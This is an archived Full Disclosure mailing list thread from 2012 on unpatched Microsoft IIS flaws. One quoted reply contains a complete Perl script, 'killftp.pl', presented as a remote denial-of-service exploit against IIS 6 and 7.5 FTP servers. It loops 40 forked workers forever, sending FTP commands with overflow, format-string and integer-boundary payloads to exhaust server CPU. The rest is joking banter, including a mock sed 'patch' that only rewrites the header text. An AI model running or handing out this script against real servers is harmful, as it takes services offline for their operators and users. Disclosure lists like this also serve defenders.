Full Disclosure mailing list archives

Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

From: Григорий Братислава <musntlive () gmail com>
Date: Mon, 16 Jul 2012 15:43:53 -0400

MusntLive is find your problem:

echo "


# Exploit Title: Microsoft IIS 6 , 7.5  FTP Server Remote Denial Of
Service (CPU exhaustion)
# Date: June 29, 2012
# Author: coolkaveh
# coolkaveh () rocketmail com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version:  Microsoft IIS 6 , 7.5  FTP Server
# Tested on: windows server 2008 r2 , seven ,
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#When sending multiple parallel FTP command  requests to a Microsoft
IIS FTP Server
#CPU usage goes up to max capacity  and server gets non responsive.
test it with two core
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Lame Microsoft IIS FTP Server Remote Denial Of Service
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



" | sed 's:coo:xXxcoo:g;s:veh:vehxXx:g;s:>
::g;s:e:3:g;s:a:@:g;s:i:\!:g;s:u:\\\/:g;s:o:\(\):g'

Is code of yours is not hacker code. MusntLive patch is your code
above. Re-test. Tested under BeOS is confirmed



On Mon, Jul 16, 2012 at 3:18 PM, kaveh ghaemmaghami
<kavehghaemmaghami () googlemail com> wrote:

Hi OK i will  plus they didn't fix
http://seclists.org/fulldisclosure/2012/Jul/27


# Exploit Title: Microsoft IIS 6 , 7.5  FTP Server Remote Denial Of
Service (CPU exhaustion)
# Date: June 29, 2012
# Author: coolkaveh
# coolkaveh () rocketmail com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version:  Microsoft IIS 6 , 7.5  FTP Server
# Tested on: windows server 2008 r2 , seven ,
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#When sending multiple parallel FTP command  requests to a Microsoft
IIS FTP Server
#CPU usage goes up to max capacity  and server gets non responsive.
test it with two core
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Lame Microsoft IIS FTP Server Remote Denial Of Service
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl -w
use IO::Socket;
use Parallel::ForkManager;
$|=1;
sub usage {
    print "Please DISABLE firewall daemon of this operating system first!\n";
    print "FTP Server Remote Denial Of Service\n";
    print "by coolkaveh\n";
    print "usage: perl killftp.pl <host> \n";
    print "example: perl killftp.pl www.example.com \n";
}
$host=shift;
$port=shift || "21";
if(!defined($host)){
        print "Please DISABLE firewall daemon of this operating system first!\n";
    print "FTP Server Remote Denial Of Service\n";
    print "by coolkaveh\n";
        print "coolkaveh () rocketmail com\n";
    print "usage: perl killftp.pl <host> \n";
    print "example: perl killftp.pl www.example.com \n";
        exit(0);
}
$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $check_first){
        print "$host -> $port is alive.\n";
        $check_first->close;
}
else{
die("$host -> $port is closed!\n");
}
@junk=('A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,
'%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s',
'%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p',
'%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x257,'-1','0','0x100',
'0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000','0x100000','1',
);
@command=(
'NLST','CWD','STOR','RETR',
'MKD','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE',
'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE
L','TYPE I','NLST','CWD', 'STOR','RETR','MKD',
'RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT',
'HELP','MODE','APPE','STRU','SITE','SITE INDEX',
'TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD',
'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM',
'SIZE','STAT','ACCT',    'HELP','MODE','APPE','STRU','SITE','SITE
INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I',
'NLST','CWD','STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE',
'STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE
I','NLST','CWD','STOR','RETR','MKD','RMD','DELE',
'RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE
INDEX','TYPE','TYPE A','TYPE E',
'TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP',
'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A',
);
print "Dosing Server!\n";
$pm = new Parallel::ForkManager(40);
while (1) {
my $pid = $pm->start and next;
   COMMAND_LIST: foreach $cmd (@command){
        foreach $poc (@junk){
                LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>$port, Proto=>'tcp', Timeout=>30);
                if(defined($sock4)){
                        $sock4->send("$cmd"." "."$poc\r\n", 0);
                        $sock4->recv($content, 100, 0);
                                }
                        }
                }
  $pm->finish;
}


On Mon, Jul 16, 2012 at 11:54 AM, Григорий Братислава
<musntlive () gmail com> wrote:

On Mon, Jul 16, 2012 at 2:50 PM, kaveh ghaemmaghami
<kavehghaemmaghami () googlemail com> wrote:

Hello list
in my testing environment (IIS 6 with php5 ) the flaw exist ..... i
think i got da move to XAMPP MS wont patch it   LOL



Test environment is not production environment. Is place your test
server in your production network and is send me information for to
test.




-- 

`Wherever I is go - there am I routed`

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin king cope (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
  - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Thor (Hammer of God) (Jul 16)
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
  - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin king cope (Jul 16)
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
    - Message not available
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
    - Message not available
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Jan Reilink (Jul 17)
  - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
  - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin king cope (Jul 17)
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Gage Bystrom (Jul 17)
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Gage Bystrom (Jul 17)
    - Message not available
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
    - Message not available
    - Message not available
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin sumit kumar soni (Jul 19)